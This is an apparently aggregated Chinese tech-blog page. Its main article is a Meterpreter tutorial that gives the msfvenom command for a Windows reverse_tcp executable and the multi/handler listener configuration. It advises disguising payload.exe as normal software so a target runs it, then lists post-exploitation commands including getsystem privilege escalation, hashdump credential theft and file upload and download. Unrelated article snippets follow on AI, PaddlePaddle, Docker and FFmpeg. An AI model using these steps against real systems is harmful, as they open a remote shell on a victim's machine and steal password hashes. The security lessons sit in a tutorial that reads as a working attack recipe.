news 2026/5/15 2:32:01

复现meterpreter

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
复现meterpreter

​​​Meterpreter反向control

1.生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.xxx.xx.130 LPORT=5000 -f exe -o ~/桌面/payload.exe

-p windows/meterpreter/reverse_tcp:payload类型,windows平台的Meterpreter反向TCP连接

LHOST=192.xxx.xx.130:监听主机IP,本机的IP地址,目标将回连至此

LPORT=5000:,监听端口,本机监听的端口

-f exe:输出格式,Windows可执行文件

-o ~/桌面/payload.exe:输出路径,生成文件的保存位置

2.设置监听器

开启metasploit框架:msfconsole

配置监听模块

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.xxx.xx.130
msf5 exploit(multi/handler) > set LPORT 5000
msf5 exploit(multi/handler) > exploit

3.payload投递与执行:伪装成正常软件或者文件,等待目标用户点击payload.exe,j随后在内存中解密和执行,向监听端口(192.xxx.xx.130:5000)发起tcp连接,与本机完成握手

4.然后进行会话建立和控制:[*] Meterpreter session 1 opened (192.xxx.xx.130:5000 -> 192.xxx.xx.1:55980)

监听器工作原理

  1. 绑定端口:在192.xxx.xx.130:5000开启TCP监听

  2. 等待连接:阻塞等待目标系统连接

  3. 建立会话:连接建立后创建Meterpreter会话

  4. 加载Stage:发送后续的Stage Payload

5.信息收集与系统侦察:meterpreter > show_mount

目标磁盘分析

Meterpreter常用命令速查

系统:

1.系统信息:meterpreter > sysinfo

2.当前用户权限:meterpreter > getuid

3.进程id:meterpreter > getpid

4.进程列表:meterpreter > ps

文件:

1.当前目录:meterpreter > pwd
2.列出文件:meterpreter > ls
3.下载文件:meterpreter > download file.txt
4.上传文件:meterpreter > upload payload.exe

权限提升:

1.尝试提权到SYSTEM:meterpreter > getsystem
2.获取密码哈希:meterpreter > run post/windows/gather/hashdump

侦察:

网络配置:meterpreter > ipconfig
路由表:meterpreter > route
ARP缓存:meterpreter > arp

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/7 6:56:53

清华唐杰:发了长微博,最近的AI感悟

Datawhale干货 作者:唐杰,清华大学教授,智谱AI首席科学家最近有一些感悟,分享一下,希望对大家有用。以下为其感悟原文:一、关于scaling基座模型预训练使得大模型已经掌握世界常识知识,并且具备简…

作者头像 李华
网站建设 2026/5/12 8:46:22

PaddlePaddle镜像能否用于自动驾驶感知模块开发?

PaddlePaddle镜像在自动驾驶感知模块开发中的可行性与实践 在智能驾驶技术加速落地的今天,感知系统的研发效率与部署灵活性正成为决定产品迭代速度的关键因素。一辆L3级以上的自动驾驶汽车每秒需处理来自多个摄像头、雷达等传感器的海量数据,而背后支撑这…

作者头像 李华
网站建设 2026/5/11 16:18:09

Docker快速搭建ES集群:ES安装实战案例

用 Docker 三分钟搭建一个高可用 Elasticsearch 集群你有没有遇到过这种情况:想本地搭个 ES 集群做测试,结果光是配置 Java 环境、下载 tar 包、改elasticsearch.yml就折腾了一下午?更别提节点发现失败、内存溢出、版本不兼容这些“经典”问题…

作者头像 李华
网站建设 2026/5/14 18:26:22

FFmpeg终极指南:快速掌握视频格式转换技巧

还在为不同设备不兼容的视频格式而烦恼吗?想要在手机、电脑、平板之间无缝播放视频文件?今天我来分享一个超级实用的视频处理工具FFmpeg,让你轻松搞定各种视频格式转换问题,彻底告别播放器不兼容的困扰! 【免费下载链接…

作者头像 李华
网站建设 2026/5/12 11:28:06

提示工程架构师进阶:灰度发布与A_B测试结合的实战策略

提示工程架构师进阶:灰度发布与A/B测试结合的实战策略 关键词 提示工程、灰度发布、A/B测试、LLM应用迭代、数据驱动决策、用户体验优化、Feature Flag 摘要 当你花费数周优化了一个LLM提示——比如把客服机器人的回复从"机械解答"改成"共情式引…

作者头像 李华
网站建设 2026/5/9 13:46:52

嘉冰数字化协助中企出海业务拓展-出海数字化最佳实践路线

[有需要提供此类服务的甲方IT,请评论区留言】1. 总部模版组织结构和编码主数据管理总账框架及币种集团科目和报表口径流程模板(O2C/P2P)定价架构和税务控制收付和资金内控和权限集成和接口管理隐私和证书管理2. 会计准则会计准则基线国家科目…

作者头像 李华